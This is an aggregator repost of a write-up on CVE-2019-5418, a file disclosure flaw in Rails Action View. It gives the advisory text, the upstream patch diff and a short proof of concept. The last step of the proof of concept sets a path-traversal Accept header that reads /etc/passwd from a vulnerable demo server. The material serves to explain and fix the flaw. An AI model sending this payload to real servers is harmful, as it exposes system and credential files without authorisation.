97
CVE-2019-5418 – File Content Disclosure on Rails
source link: https://www.tuicool.com/articles/hit/vuM7B3J
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
CVE-2019-5418 - File Content Disclosure on Rails
There is a possible file content disclosure vulnerability in Action View. Specially crafted accept headers in combination with calls to render file: can cause arbitrary files on the target server to be rendered, disclosing the file contents.
The impact is limited to calls to render which render file contents without a specified accept format. Impacted code in a controller looks something like this:
found by John Hawthorn from GitHub
Technical Analysis:
Security Advisory:
From f4c70c2222180b8d9d924f00af0c7fd632e26715 Mon Sep 17 00:00:00 2001 From: John Hawthorn <[email protected]> Date: Mon, 4 Mar 2019 18:24:51 -0800 Subject: [PATCH] Only accept formats from registered mime types [CVE-2019-5418] [CVE-2019-5419] --- .../lib/action_dispatch/http/mime_negotiation.rb | 5 +++++ actionpack/test/controller/mime/respond_to_test.rb | 10 ++++++---- .../new_base/content_negotiation_test.rb | 14 ++++++++++++-- 3 files changed, 23 insertions(+), 6 deletions(-) diff --git a/actionpack/lib/action_dispatch/http/mime_negotiation.rb b/actionpack/lib/action_dispatch/http/mime_negotiation.rb index 498b1e669576..4e81ba12a58b 100644 --- a/actionpack/lib/action_dispatch/http/mime_negotiation.rb +++ b/actionpack/lib/action_dispatch/http/mime_negotiation.rb @@ -79,6 +79,11 @@ def formats else [Mime[:html]] end + + v = v.select do |format| + format.symbol || format.ref == "*/*" + end + set_header k, v end end
Proof Of Concept
- Run the vulnerable application inside the demo folder:
foo@bar:~$ cd demo/ foo@bar:~$ bundle install [...] foo@bar:~$ rails s 12:59:54 => Booting Puma => Rails 5.2.1 application starting in development => Run `rails server -h` for more startup options Puma starting in single mode... * Version 3.12.0 (ruby 2.5.1-p57), codename: Llamas in Pajamas * Min threads: 5, max threads: 5 * Environment: development * Listening on tcp://0.0.0.0:3000 Use Ctrl-C to stop Started GET "/" for 127.0.0.1 at 2019-03-16 13:00:00 +0100 Processing by Rails::WelcomeController#index as HTML Rendering /var/lib/gems/2.5.0/gems/railties-5.2.1/lib/rails/templates/rails/welcome/index.html.erb Rendered /var/lib/gems/2.5.0/gems/railties-5.2.1/lib/rails/templates/rails/welcome/index.html.erb (1.4ms) Completed 200 OK in 8ms (Views: 2.7ms | ActiveRecord: 0.0ms) Started GET "/chybeta" for 127.0.0.1 at 2019-03-16 13:00:03 +0100 Processing by ChybetaController#index as HTML Rendering README.md within layouts/application Rendered README.md within layouts/application (0.2ms) Completed 200 OK in 122ms (Views: 121.1ms | ActiveRecord: 0.0ms)
- Go to the route
/chybeta - Intercept with burp the request and replace the
Acceptheader withAccept: ../../../../../../../../../../etc/passwd{{
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK